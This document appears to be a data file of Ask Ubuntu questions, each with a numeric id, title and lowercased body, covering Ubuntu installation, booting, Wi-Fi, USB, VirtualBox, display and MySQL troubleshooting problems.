solve the ant-problem . can this be related to the downloads-problem i 'm having ? 3 . ) i was looking for a trouble-shooter program similar to slimcleaner this morning , but could n't find one yet . any suggestions ? i would really appreciate some help , especially with the downloads-issue . -gunther
391581	installation of ubuntu with windows 8	iâ´m new on linux and i have the problem that i can`t install it on my pc . the pc is original with windows 8 . i do n't need the windows i only want ubuntu on the pc but i am not able to install it . i have made an live usb to start ubuntu but when i change the start up in bios that the pc should boot from usb i always get the information that there is no way to start from usb i tried it on several ways an the secure start up is disabled , too . does anyone have an answer for me ? thanks .
391582	ca n't format memory stick , get errors	i tried to format my memory stick , it says operation failed , but i get the following errors : error creating partition table : helper exited with exit code 1 : can not open /dev/sdb : no medium found . i used the disk utility to format it . and i 'm running ubuntu 12.04 lts . what can i do ? please assist me in this . can i format it in fat32 like you would normally be able to do in windows ?
391584	virtual box does n't work	virtual box does n't work . when i try to strat any virtual machine i get the next error : failed to open a session for the virtual machine windows 8.1 . failed to load vmmr0.r0 ( verr_suplib_owner_not_root ) . result code : ns_error_failure ( 0x80004005 ) component : console interface : iconsole { db7ab4ca-2a3f-4183-9243-c1208da92392 } i had installed the version 4.3.0 , and i have completely removed it with synaptic package maneger and have installed the version 4.3.4 but i get the same error . how to fix it ?
391594	running a script at shutdown	i 've read the answers to this and similar questions already , but so far none had worked for me . on my ubuntu 11.10 ( oneiric ) system , all the files in /etc/rc0.d/ and /etc/rc0.d/ are links . i put my script ( called *shutdown_script* ) in the /etc/init.d/ directory and created two symbolic links to it , one in /etc/rc0.d/ and the other in /etc/rc6.d , both with the name *k99shutdown_script* . the script is not being run at shutdown , which is what i want . the script is just to test if i could run a script at shutdown ; i supply the code in shutdown_script below : # ! /bin/sh # # tests script to run at shutdown . # script creates a fil and writes to it . # # usage : ./shutdown-script touch $ home/shutdown.log echo `` shutting down at `date` ... '' > > $ home/shutdown.log as you can see , it just adds a file to the home folder showing the current date and time . please could you tell me what i may be doing wrong , and more importantly , how to get a script to run at shutdown .
391607	windows 8 boot problems after using chntpw utility	after recently being a victim of triplescomputers.com i used the chntpw utility password recovery to reset/disable the syskey password encryption . i ran into a few hurdles such as mounting my windows partition for read/write . since i had no other options besides forcing the mount , i had to proceed with the following : '' if you need to mount the partition in read-write mode and are not able to or willing to boot into windows and shut it down completely there is a third option . however , it is not included here because it completely deletes hiberfil.sys and will cause you to lose all unsaved information in the hibernated windows programs . the following is a quotation from man ntfs-3g about the option that would be used to do this . remove_hiberfile unlike in case of read-only mount , the read-write mount is denied if the ntfs volume is hibernated . one needs either to resume windows and shutdown it properly , or use this option which will remove the windows hibernation file . please note , this means that the saved windows session will be completely lost . use this option under your own responsibility . '' the above steps are found in the following article : unable to mount windows ( ntfs ) filesystem due to hibernation after mounting windows partition i proceeded with disabling syskey sam password : ***************** syskey is enabled ! ************** this installation very likely has the syskey passwordhash-obfuscator installed it 's currently in mode = -1 , unknown-mode syskey is on ! however , do not disable it unless you have to ! this program can change passwords even if syskey is on , however if you have lost the key-floppy or passphrase you can turn it off , but please read the docs first ! ! ! ** if you do n't know what syskey is you do not need to switch it off ! ** note : on windows 2000 it will not be possible to turn it on again ! ( and other problems may also show.. ) note : disabling syskey will invalidate all passwords , requiring them to be reset . you should at least reset the administrator password using this program , then the rest ought to be done from nt . do you really wish to disable syskey ? ( y/n ) [ n ] - see more at systembash.com after it 's all set and done and after rebooting , windows 8 goes black screen and never boots , loads up recovery tool . can someone help me ? should i try to fix windows 8 boot problems with other ubuntu tools ? i do n't want to use recovery cd or reinstall since my data and os are on the same partition .
391611	which partition can i delete ?	i currently have a machine running windows 7 on it and would like to set up a dual boot with ubuntu ( 14.03 ) . the computer is an all-in-one and therefore came preassembled and preinstalled with the os . it also has 4 partitions : 1 system partition ( i think windows creates this upon installation automatically ) , 1 boot partition on which the main part of my os resides , one recover partition ( 20gb ) and one oem partition ( i think this might have been created by the manuacturer of the hdd ) . i also shrunk my boot partition and created some unallocated space to install ubuntu in . now as i understand it , i will not be able to install ubuntu with 4 ( primary ? ) partitions already on my system . i do n't know if the oem partition for example could be removed without causing damage so that i can install ubuntu . also one quick question to the installation itself : should i choose install alongside windows ? will ubuntu automatically install in the unallocated space if i do that ? any advice is greatly appreciated !
391614	bulk transfer not working libusb	i 'd just like to ask why this error keeps on popping up everytime i run my program . here is my code : # include < iostream > # include < libusb.h > using namespace std ; int main ( ) { libusb_device **devs ; //pointer to pointer of device , used to retrieve a list of devices libusb_device_handle *dev_handle ; //a device handle libusb_context *ctx = null ; //a libusb session int r ; //for return values ssize_t cnt ; //holding number of devices in list r = libusb_init ( & ctx ) ; //initialize the library for the session we just declared if ( r < 0 ) { cout < < `` init error `` < < r < < endl ; //there was an error return 1 ; } libusb_set_debug ( ctx , 3 ) ; //set verbosity level to 3 , as suggested in the documentation cnt = libusb_get_device_list ( ctx , & devs ) ; //get the list of devices if ( cnt < 0 ) { cout < < `` get device error '' < < endl ; //there was an error return 1 ; } cout < < cnt < < `` devices in list . `` < < endl ; dev_handle = libusb_open_device_with_vid_pid ( ctx , 1155 , 61183 ) ; //these are vendorid and productid i found for my usb device if ( dev_handle == null ) cout < < `` can not open device '' < < endl ; else cout < < `` device opened '' < < endl ; libusb_free_device_list ( devs , 1 ) ; //free the list , unref the devices in it unsigned char *data = new unsigned char [ 4 ] ; //data to write data [ 0 ] ='a ' ; data [ 1 ] ='b ' ; data [ 2 ] ='c ' ; data [ 3 ] = 'd ' ; //some dummy values int actual ; //used to find out how many bytes were written if ( libusb_kernel_driver_active ( dev_handle , 0 ) == 1 ) { //find out if kernel driver is attached cout < < `` kernel driver active '' < < endl ; if ( libusb_detach_kernel_driver ( dev_handle , 0 ) == 0 ) //detach it cout < < `` kernel driver detached ! `` < < endl ; } r = libusb_claim_interface ( dev_handle , 0 ) ; //claim interface 0 ( the first ) of device ( mine had jsut 1 ) if ( r < 0 ) { cout < < `` can not claim interface '' < < endl ; return 1 ; } cout < < `` claimed interface '' < < endl ; cout < < `` data- > '' < < data < < `` < - '' < < endl ; //just to see the data we want to write : abcd cout < < `` writing data ... '' < < endl ; r = libusb_interrupt_transfer ( dev_handle,0x01 , data , 4 , & actual , 0 ) ; //my device 's out endpoint was 2 , found with trial- the device had 2 endpoints : 2 and 129 if ( r == 0 & & actual == 4 ) //we wrote the 4 bytes successfully cout < < `` writing successful ! `` < < endl ; else cout < < `` write error '' < < endl ; r = libusb_release_interface ( dev_handle , 0 ) ; //release the claimed interface if ( r ! =0 ) { cout < < `` can not release interface '' < < endl ; return 1 ; } cout < < `` released interface '' < < endl ; libusb_close ( dev_handle ) ; //close the device we opened libusb_exit ( ctx ) ; //needs to be called to end the delete [ ] data ; //delete the allocated memory for data return 0 ; } and here is the error that appears after i run it . libusbx : error [ submit_bulk_transfer ] submiturb failed error -1 errno=2 i 'm currently working on an stm32f4discovery and have setup the descriptor of the in and out endpoint as follows /* 18 */ 0x09 , /*blength : hid descriptor size*/ hid_descriptor_type , /*bdescriptortype : hid*/ 0x11 , /*bcdhid : hid class spec release number*/ 0x01 , 0x00 , /*bcountrycode : hardware target country*/ 0x01 , /*bnumdescriptors : number of hid class descriptors to follow*/ 0x22 , /*bdescriptortype*/ hid_mouse_report_desc_size , /*witemlength : total length of report descriptor*/ 0x00 , /******************** descriptor of mouse endpoint ********************/ /* 27 */ 0x07 , /*blength : endpoint descriptor size*/ usb_endpoint_descriptor_type , /*bdescriptortype : */ hid_in_ep , /*bendpointaddress : endpoint address ( in ) */ 0x03 , /*bmattributes : interrupt endpoint*/ hid_in_packet , /*wmaxpacketsize : 4 byte max */ 0x00 , 0x0a , /*binterval : polling interval ( 10 ms ) */ /* 34 */ /******************** descriptor of bulk out endpoint ********************/ // < -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- /*34*/ 0x07 , /*blength : endpoint descriptor size*/ usb_endpoint_descriptor_type , /*bdescriptortype : */ hid_out_ep , /*bendpointaddress : endpoint address ( in ) */ 0x03 , /*bmattributes : interrupt endpoint*/ hid_out_packet , /*wmaxpacketsize : 4 byte max */ 0x00 , 0x0a , /*binterval : polling interval ( 10 ms ) */ /*41*/ i have already tried getting data from the microcontroller but i had a hard time sending data to it . is it alright if i only have 1 configuration , 1 interface but two endpoint descriptor for in and out . btw , the the in and out were defined as follows : # define hid_in_ep 0x81 # define hid_out_ep 0x01 # define hid_in_packet 4 # define hid_out_packet 4 i 'm kinda new to usb stuff so please bear with me , doing this for my final project . thanks a lot ! : )
391615	permissions - listing uid	two part question : what is a world-writeable directory and file ? i 'm looking for a script that would display the directories on all partitions of a server , that are not owned by root or a system account . in our environment , all world-writable directories should be owned by root or another system account .
391616	how do i change keyboard layout ?	my keyboard layout in ubuntu does n't fully correspond to my actual keyboard . this could be either because i chose the wrong option during the installation , or because my misguided attempts to fix the keyboard layout switcher that ubuntu broke in 13.10 , compared to 13.04 . here 's what i see in ubuntu keyboard layout chart : on my keyboard there are backspace instead of ] , ) âabove 0 and [ instead of : . it says `` english ( us ) '' , but does n't look like one . also , the keyboard in the chart has an l-shaped enter key , so ca n't be `` english ( us ) '' , but probably some european type . how do i change my keyboard layout to a proper one ? command line is ok . i am using english ( us ) and russian layouts , between which i am switching with ctrl+shift . i managed to fix that bit , so that both ctrl+shift and the shortcuts that contain it ( like ctrl+shift+tab to switch browser tabs backwards , ) do work . i am using ubuntu 13.10 32-bit .
391620	how to resume release upgrade ?	i was upgrading from 13.04 to 13.10 via ssh ( did n't use screen ) . my ssh connection was interrupted when do-release-upgrade script was about to remove obsolete packages . now when i reconnect and run it it just says no new release found . how to finish upgrade process ?
391622	download a whole website with wget ( or other ) including all its downloadable content	i 'm trying to download winamp 's website in case they shut it down . i need to download literally everything . i tried once with wget and i managed to download the website itself pretty well but when i try to download any file from it it gives a file without an extension or name . how can i fix that ?
391624	backup and restore all application to fresh ubuntu install	i want to backup all my installed applications so that i can use them in fresh installation of ubuntu ( 12.04 as of now ) later . aptoncd only picks up .deb ( at /var/cache/apt/archives ) but i have installed packages by downloading from the internet . what i want to backup all my applications and configurations so that i do not have to go through the hurdle again . this and this are useful but i guess solution to my problem is simpler than this . why ca n't i backup all everything within the root ( / ) and then when ubuntu is installed fresh just copy all the files to the new / and then do sudo apt-get update and update grub and etc/fstab ? please help this newbie to understand this .
391628	install ubuntu touch on karbonn a30 phablet	i want to install ubuntu touch on my phablet but is it resourceful . software that are available for ubuntu desktop will work on this or not ? if not where can i find s/w for ubuntu touch .
391629	ubuntu 13.10 sound control problem	i have a serious problem with sound control in my ubuntu 13.10 . it just went crazy . but , to be specific - it 's constantly making the volume go up to the max and now it 's flashing in the upper right corner . and it happened suddenly , i was listening to music and i eas n't changing the volume . i restered my pc and tried to shut down some proceses but with no effect at all . edit : ok , so i restarted it once again , tried to change the volume from notification and it worked , when i used keyboard buttons it rapidly went up but now it works fine . still , i do n't know what seemed to be the problem but it 's a bit worrying ...
391631	how to configure vodaphone mobile broadband	i am trying to get my uk vodafone mobile broadband dongle to work with ubuntu 12.04 lts . have tried using the wizard and the configuration appears to be correct for a contract but it refuses to connect on it 's own . however this is strange , if i connect to my home wifi first and establish a connection then try connecting to vodafone it then appears to connect ok and says connection established but if i disconnect my wifi it says vodaphone is still connected but it is not because my browser is no longer working . trevor
391635	how to install ubuntu on a chromebook ?	i 've just finished downloading ubuntu for my c710 and rather than it being in ubuntu it is still chrome os . how do i install ubuntu on a chromebook ?
391645	how to authenticate a ubuntu 12.04 desktop on an ldap-server ( under ubuntu server 12.04 )	i 've a ubuntu desktop 12.04 and a server 12.04 . i want to store all users and groups on the server and then login on the client with them . ( like an ad on windows ) i though about a ldap-server . i went through this documentation . now the ldap-server works . ( tested with a ldapsearch ) the problem is when i want to login the client with the ldap-server after this did n't work . the client did n't know the user . have i forgotten something , where is my mistake ? are there any other/better solutions ?
391653	file manager pcmanfm not the one as shown in usc	i 've installed ubuntu 13.10 , and also installed pcmanfm from usc , but when i launched it , it did n't work as indicated in this page . it works more like files . is it possible someone put in a wrong one in the usc ? and when i search in dashboard , the filtered result shows pcmanfm and desktop preference , not that i expect pcmanfm and files .
391654	format a usb stick completely	how can i delete all data that is on stick ? for example i have this problem : my stick has two partitions a ( 3.7 gb ) and b ( 330 mb ) . how can i merge the two partitions in one and to delete all data that they contain ? i guess they have read-only properties ... how can i force deleting them ? i see this in gparted :
391656	no automatic thumbnail generation	i recently decided to do a fresh install of 13.10 and ran into a quite peculiar problem . it seems that thumbnails are not generated automatically , when i open a folder in nautilus i can only see a loading icon . if i refresh the folder one new icon is generated , hence i have to press f5 repeatedly in order to get a full set of thumbnails which can be quite frustrating . this happens regardless of filetype , even folder icons fail to generate until f5 has been pressed . so far i have tried to delete the ~/.thumbnails folder and just to be sure i 've given the newly generated folder a 777 permission via chmod but the problem still persists so i am starting to suspect that something may be wrong with my libgnome-desktop library but that 's just a wild guess at the moment . any help or suggestions are would be appreciated since i am running out of ideas of how to resolve this issue .
391657	how to edit lines in ubuntu 12.04 lts update manager	every time i try to update my system the update manager tells me that there is a problem on line two concerning a docking program i downloaded and installed . i just want to delete or skip this line so the update manager can move on , other wise it just stops at this line . any suggestions will be greatly appreciated .
391663	i ca n't get my audio to work in ubuntu 13.10	ca n't get speakers or headphones to work in ubuntu for my gateway m-151 notebook
391664	black display in xubuntu 13.10	i installed xubuntu 13.10 a while ago . everything was great up until just now when i tried to connect to an external monitor . after connecting the vga cable from my laptop to the monitor i tried to use the 'display ' option under 'hardware ' in the settings manager . it recognised my monitor but when i clicked the 'use this output ' checkbox not only did the monitor remain blank but my laptop 's own display also went blank ! neither removing the vga cable nor rebooting solved the problem ( it would display the login screen but as soon as i log in nothing is displayed ) . however if i log in as a guest account everything is as expected ( i am posting this from the guest account ) . so my guess would be the display manager has erroneously set some display option on my account . what would be the best course of action to get my laptop 's screen working on my main account ? also is there some trick i need to know to get dual monitors working ? i 'd hate to have to boot into windows every time i need dual monitors ...
391665	unable to install momentics ide in ubuntu 13.10	i 've installed ubuntu 13.10 on my system , now i am unable to start momentics ide with ubuntu 13.10 . i am getting below error while starting ide . ./ide gtk-message : failed to load module `` overlay-scrollbar '' gtk-message : failed to load module `` unity-gtk-module '' please help me to solve this
391668	add custom resolution to dual monitor setup ubuntu 13	i switched from windows 8.1 to ubuntu and now i have a resolution problem , before i had 2 * 1280x1024 now one is 1280x1024 and the other one 1152x864 i tried some console commands as shown below : cvt 1280 1024 60 xrandr -- newmode < modeline > xrandr -- addmode vga-0 `` 1280x1024_60.00 '' i got this error : error of failed request : badname ( named color or font does not exist ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 16 ( rrcreatemode ) serial number of failed request : 31 current serial number in output stream : 31 graphics card : nvidia geforce 210 ( drivers installed with nvidia current also )
391669	open file on already open application	i use vlc to open my video files , but every time i double click on a video a new instance of vlc is created . i want that when a vlc is already open , then the new video file should open in that existing player instead of creating a new instance .
391671	my external hdd has stopped working need help to backup the files	i have got a 320gb external hdd ( seagate ) and few days ago it stopped working.. when connect to a pc i can see the hdd is connect but can not view the files inside it ... when used in windows 7 os the pc hangs . please help me recover the data.. psp @ psp-virtualbox : ~ $ sudo fdisk -l [ sudo ] password for psp : disk /dev/sda : 34.4 gb , 34359738368 bytes 255 heads , 63 sectors/track , 4177 cylinders , total 67108864 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000b1bdd device boot start end blocks id system /dev/sda1 * 2048 62914559 31456256 83 linux /dev/sda2 62916606 67106815 2095105 5 extended /dev/sda5 62916608 67106815 2095104 82 linux swap / solaris psp @ psp-virtualbox : ~ $ sudo testdisk select a media ( use arrow keys , then press enter ) : > disk /dev/sda - 34 gb / 32 gib - vbox harddisk disk /dev/sr0 - 55 mb / 52 mib ( ro ) - vbox cd-rom > [ proceed ] [ quit ] note : disk capacity must be correctly detected for a successful recovery . if a disk listed above has incorrect size , check hd jumper settings , bios detection , and install the latest os patches and disk drivers . please help me ... .. i need the data on this hdd..
391673	ca n't use zyxel wifi dongle with ubuntu 13.10	i have some issue to have wifi working properly on my pc . i 'm using a wifi dongle from zyxel , type nwd2205 , region : etsi . ubuntu is 13.10 . i used this dongle on windows and it worked ok with strong signal . now with ubuntu i have a very random behavior . some time the dongle works ok and i can access internet ( right now for example ) and after a few minutes , i lost the connection . after that , sometime the connection is up again and sometimes i have to disable - enable wifi and/or networking a few time and/or unplug - replug the dongle to get it to work again . i 've searched through some topic on wifi but i was not able to get it to work .
391675	ca n't access ubuntu or windows after shut down the ubuntu	i 'm using ubuntu 12.04 lts and windows 7 as partition . i was using ubuntu for some time and tried to shut down . but it does n't shown shut down dialog box . so i again tried to shut down from top right shutdown icon . but it hangs for a 30min . so i force shut down by hardware power switch . after that i tried to boot ubuntu and it is not working . i also tried to boot windows . it is also not working . what should i do ? i can view the os option selecting screen ( grub ) . but after selecting an os , it is not working . help thanks in advance .
391676	syscall numbers of an ubuntu distribution	for a given ubuntu machine how can i figure out the system call number and its corresponding system call function name ? also , would these differ across a 32 bit and a 64 bit machine of the same release ? i 'm trying this specifically for `` precise '' .
391681	moving free space from c drive ( ntfs ) to g drive ( ext4 )	i am totally new to ubuntu . i have installed ubuntu 13.1 with 5gb space in drive g but now i cleaned windows on c drive and want to move free space from c drive to g drive . pls help me with the detailed process . thanks in advance .
391683	unable to boot ubuntu 13.10 after install on acer desktop	after install and restart i get an error screen saying `` reboot and select proper boot device or insert boot media in selected device and press a key '' this is an ubuntu only boot . when i first installed over win 8.1 ubuntu worked fine until i updated , now it seems after several installs that even just the 13.10 with no update is causing the same screen to show . i 've booted into ubuntu to try and change the boot partition to be the first however there is a 500mb fat32 partition in front of it that i ca n't seem to remove or move . i am also running ubuntu 13.10 on my acer laptop which has been updated and working fine . both installs were done from the same dvd . i am believe it is the partition causing the problem but i have no clue how to change it .
391688	migrate ubuntu 10.04 lts to different hardware	i have a server with ubuntu 10.04 lts . the server works for about 3 years with no critical problems . and you know “if it ain’t broke , don’t fix it” . but for the last several months i faced the following problems with it : server doesn’t respond for a certain period of time but works normally after server starts to work very slowly i believe that the problem comes from the insufficient hardware so i decided to upgrade it . but again i don’t want to fix the software that is not broken . so the question is the following : how to move every software instance to the new server hardware with minimum efforts . the optimal solution will be to upgrade the hardware without software tuning but it seems to be impossible .
391689	no internet ( connected to router , works on windows )	i can not access internet . i can access the configuration page of my router , but no web page . when booted on windows , the same computer has full internet access . i do n't know what happened . someone may have changed something regarding the router , but i really do n't know . it seems that my linux networking configuration is somehow screwed up . see below for terminal outputs . please help me ! thanks ! edit : contrary to my expectations , the issue seems to be more network-related than config-related . i have internet access while using another network . i could not test this when i posted . additional info the network causing the trouble has a mac address filter . the two addresses of my computer ( wired & wireless ) are in the list . it is set to accept the devices in the list . the security is wpa2 . as i can access the config page of the router , the issue does not seem to relate to security . terminal outputs ( if you know how i can change the language of these outputs , tell me ! ) inxi -n network : card-1 : broadcom netlink bcm5784m gigabit ethernet pcie driver : tg3 card-2 : broadcom bcm4312 802.11b/g lp-phy driver : wl ifconfig eth0 link encap : ethernet hwaddr 00:26 : b9:02:95 : b3 up broadcast multicast mtu:1500 metric:1 packets reçus:850 erreurs:0 :0 overruns:0 frame:0 tx packets:566 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 lg file transmission:1000 octets reçus:75127 ( 75.1 kb ) octets transmis:69582 ( 69.5 kb ) interruption:17 eth1 link encap : ethernet hwaddr 00:22:5f : eb:85:4d inet adr:10.168.5.124 bcast:10.168.5.255 masque:255.255.255.0 adr inet6 : fe80 : :222:5fff : feeb:854d/64 scope : lien up broadcast running multicast mtu:1500 metric:1 packets reçus:548 erreurs:0 :0 overruns:0 frame:23992 tx packets:1720 errors:16 dropped:0 overruns:0 carrier:0 collisions:0 lg file transmission:1000 octets reçus:61212 ( 61.2 kb ) octets transmis:184595 ( 184.5 kb ) interruption:17 lo link encap : boucle locale inet adr:127.0.0.1 masque:255.0.0.0 adr inet6 : : :1/128 scope : hôte up loopback running mtu:16436 metric:1 packets reçus:332 erreurs:0 :0 overruns:0 frame:0 tx packets:332 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 lg file transmission:0 octets reçus:14960 ( 14.9 kb ) octets transmis:14960 ( 14.9 kb ) iwconfig lo no wireless extensions . eth1 ieee 802.11abg essid : '' phoenix '' mode : managed frequency:2.412 ghz access point : 98:2c : be : f9 : c6:59 retry long limit:7 rts thr : off fragment thr : off power management : on eth0 no wireless extensions . sudo lshw -c network *-network description : interface réseau sans fil produit : bcm4312 802.11b/g lp-phy fabriquant : broadcom corporation identifiant matériel : 0 information bus : pci @ 0000:04:00.0 nom logique : eth1 version : 01 numéro de série : 00:22:5f : eb:85:4d bits : 64 bits horloge : 33mhz fonctionnalités : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) ip=192.168.0.114 latency=0 multicast=yes wireless=ieee 802.11abg ressources : irq:17 mémoire : f8000000-f8003fff *-network description : ethernet interface produit : netlink bcm5784m gigabit ethernet pcie fabriquant : broadcom corporation identifiant matériel : 0 information bus : pci @ 0000:08:00.0 nom logique : eth0 version : 10 numéro de série : 00:26 : b9:02:95 : b3 taille : 100mbit/s capacité : 1gbit/s bits : 64 bits horloge : 33mhz fonctionnalités : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.121 duplex=full firmware=sb v2.17 latency=0 link=no multicast=yes port=twisted pair speed=100mbit/s ressources : irq:47 mémoire : fc100000-fc10ffff
391692	missing applications and odd behaviour when searching for packages	i do n't get this : i currently have two ubuntu virtual machines running , 12.04 and 13.10 . if i open the software center and search from the front page ( ie . search all programs ) for `` mythbuntu '' i get four irrelevant results . if i from the front page first choose system and then do the same search , 13.10 finds what i 'm looking for , 12.04 finds nothing . both installs are fresh , no preferences have been changed . why am i not able to figure out how to do a simple search ? on a related note , why do the clearly intended to be clickable `` available on the software centre '' buttons on https : //apps.ubuntu.com/ only show an `` open with app ... '' dialog ? and after choosing the software center in /usr/share/applications nothing happens ?
391693	ubuntu 13.10 , not recognizing 2nd monitor	just installed ubuntu for the first time and my monitor is n't showing up on the display settings . i am on a laptop with nivdia graphics if that helps . i believe i have bumblebee installed . other videos show that you should go into your nivdia software and change it ... but i do n't believe i have it ... thanks
391694	ubuntu 13.10 failure to load video settings on boot when wireless usb stick is unplugged ? ( boots fine when plugged in )	just wanted to post this here as i noticed an odd issue with my ubuntu installation this morning . tl/dr : when my wireless usb stick is left unplugged at boot , the system fails to load video config and reports errors for running in low-graphics-mode , but lgm fails to init and i am unable to reconfigure video settings or load backed-up settings -- essentially it bricks my system when the usb stick is left unplugged at boot . the source of my problem first off , for some reason any version of ubuntu i 've installed over the past few years has hated any wireless usb sticks i 've ever tried to use . from linksys / cisco to belkin , from b/g/n , my wifi connection always drops within minutes of use , and has to be unplugged and replugged into a usb outlet to establish a working connection ( even though it says i am connected , websites , apt and ubuntu store downloads simply cease before reporting connection errors ) . the issue as i have to constantly unplug and replug my wireless sticks , sometimes they are unplugged at boot . however , i have noticed that if one of my usb sticks is unplugged -- i am met with an error about low graphics mode upon boot , loading low graphics mode fails ( if it did n't load 20 minutes after boot i do n't see it happening if i wait more ) and it is impossible to choose generic or backed-up settings , the options simply reload the recovery menu when clicked . why ? my usb stick has nothing to do with video -- i have reinstalled ubuntu numerous ( let 's say 20+ ) times thinking something was wrong with my amd/ati gpus , but it turns out that all along the issue i was experiencing is due to my my wireless sticks ... the sticks and simple configuration in question the sticks : cisco ae1000 & belkin n300 micro desktop : amd fx-8150 , sapphire radeon hd 6770 htpc : intel g860 , sapphire radeon hd 7750 wireless : wireless n-only ( all devices in my house are capable of n , using b/g for compatibility over speed is n't desired here ) , router supports ipv6 , testing with and without ipv6 yields interesting results -- w/o ipv6 it is faster but more prone to failing faster and ca n't reconnect after failing , w/ ipv6 ( auto & link-local only ) the connection is slower but remains connected longer , and sometimes can reconnect itself . i have tried ndiswrapper & ath9k nohwcrypt=1 the loss of connection still remains . i am currently running vanilla wireless drivers from ubuntu , not ndiswrapper .
391697	ubuntu crash and beeps	for some time my computer has been beeping three beeps together , then one and after awhile a long beep . today ubuntu crashed . any suggestions on what to do ? i do n't know if the two probelms are related .
391698	how do you make gedit an html editor ?	how do you turn gedit into an html editor ? i want to write html but have trouble finding a reliable editor/interpreter/compiler ...
391702	ubuntu media install and hard drive overwrite	during the install of ubuntu media , i was asked if i wanted to overwrite the hard drive , for better security . i clicked on yes , and now that process has been running for 48 hours , should i be patient and continue , or do you think something is wrong ?
391703	ubuntu 12.04 usb iphone 4s tethering	i just installed ubuntu 12.04 and i ca n't get the tethering to work . i found many solutions to this problem , but i do n't have internet access except the iphone . and most of the fixes are online based or old ! can i can download the required packages with windows ( which does connect ) , put those files on a external drive , and fix it that way ?
391706	problems loading yahoo and others	i have been having issues with several websites saying `` server not found '' , and i have ruled out proxy issues as the cause . from what i have found while looking for assistance , my problem likely lies with dns . if you have ubuntu 12.04 , and can both load and use yahoo mail , please post the contents of the following folder so i can compare mine to yours and hopefully resolve my issue . also , please post the full text of the files within the folder as seen through the text editor app . file system - etc - dhcp3
391716	take picture from webcam when an incorrect password is entered	i would like to let the webcam take pictures of people who are trying to gain access of my laptop . on every incorrect login password the webcam should take picture . so , how can i do this . i have searched for this from almost 3-4 days and also found some solutions but they have some issues . i have found this can i make the webcam take a picture when an incorrect password is entered ? but here in the comment it says that the process can go into infinite loop and can corrupt system . so is there any other method or this is the safe one . also if there any softwares please tell .
391717	ubuntu virtual memory overcommit apparently hitting mysql performance	i have several installations using ubuntu server 10.04 and 12.04 lts running on dedicated and vps with various hosting companies . i am hitting a problem where , especially on migrating to a new server or after doing apt-get upgrade , mysql runs exceptionally slow . using various tools to find the problem , including `` mysqltuner '' , `` innotop '' and `` atop '' . here is an example from `` atop '' atop : mem | tot 31.4g | free 26.5g | cache 314.4m | buff 88.0m | slab 59.4m | swp | tot 1.0g | free 1.0g | | vmcom 23.2g | vmlim 16.7g | dsk | sdb | busy 100 % | read 153 | write 251 | avio 24 ms | ( swp and dsk lines are in red ) mysqltuner : [ -- ] data in myisam tables : 37g ( tables : 11 ) [ -- ] data in innodb tables : 13g ( tables : 79 ) [ ! ! ] total fragmented tables : 14 mysql config : innodb_buffer_pool_size = 20g innodb_flush_method = o_direct innodb_log_file_size = 200m key_buffer_size = 500m a job that would normally take around 30-60mins is now taking 4 hrs and counting . i would be grateful if anyone could shed any light on why this might be and suggest ideas to resolve the situation .
391721	ubuntu does not start up automatically	i loaded ubuntu onto the hard drive and got a message that it was successfully installed . when i try to restart with ubuntu it does not boot up , it does not recognize the ubuntu os , msg shows on screen asking to boot from a cd . i can use ubuntu from the dvd drive as a `` try ubuntu '' , but will not work otherwise . i 've tried several different times adjusting the bios boot sequence . can you give some other constructive advice on how to get it to boot up automatically from the hard drive ? there are no other programs on the hard drive , about 25gb , it was reformatted , it 's an old computer from about 2002 , pentium 4 , w/3gb ram . give detailed info. , not that tech savy . thanks .
391722	ubuntu 13.10 : virtualbox crash problem	i have vm running with following configurations : ram : 1000mb video memory : 128mb enabled : 3d accleration guest os : ubuntu 13.10 ( guest additions ) however my ubuntu is not working fine . i login virtualbox crashes . if i decrease ram to 512mb , i get login loops . over 1.5gb virtual box always crashes . host system spects : intel core i5 @ 2.4ghz quad core , 6gb ram , 1.6gb intel hd graphic 3000 , windows 7 home premium x64 please tell me what to do . thanks
391728	old pc will not boot ubuntu from cd , but computer will	i want to use ubuntu on an old machine which is currently running xp and turn it into a server . i downloaded and burned a cd but the win xp host 's bios fails to boot from the cd . i get the following error : ( initramfs ) stdin : i/0 error mounting /dev/loop0 on//filesystem.squashfs failed : no such device after some searching some people said to re-download and check the file size so i did and the behavior is the same . i then tried to boot the same cd from on a more modern computer and it worked fine . any ideas as how to get the ubuntu on my old machine would be appreciated .
391733	how do i find userdir directives	where do i find the userdir directives from apache2 ? they are n't in /etc/apache2/extra/httpd-userdir.conf .
391734	wifi password does n't work on ubuntu 12	i jusy installed ubuntu 12.04 and had a lot of problems getting the wifi to be recognized . but even as i solved that issue i can not yet get connect with my wifi , as my ( 100 % sure ) correct password is not accepted and the system keep asking me for the password . anybody here could help ? thnks a lot !
391735	screen dimmer in ubuntu than in windows - haswell nec lavie	i just bought a new laptop , on which i immediately installed ubuntu 13.10 . pretty much everything worked out of the box , except the screen brightness . the maximum brightness in ubuntu is much lower than it was with the preinstalled windows 8 . brightness controls work , but they go from backlight being totally off to something like 50-60 % of windows brightness . i 've tried changing grub settings to acpi_vendor=legacy as well as vendor . i 've also tried various settings for the osi string . any ideas how to diagnose and fix this ? i think i 'm the first person to ever install linux on this particular laptop . it 's an nec lavie lz750 , imported from japan . it 's an i7-4500u using intel graphics . any help would really be appreciated . i love this laptop and ca n't really consider switching back to windows , but the screen is really dim .
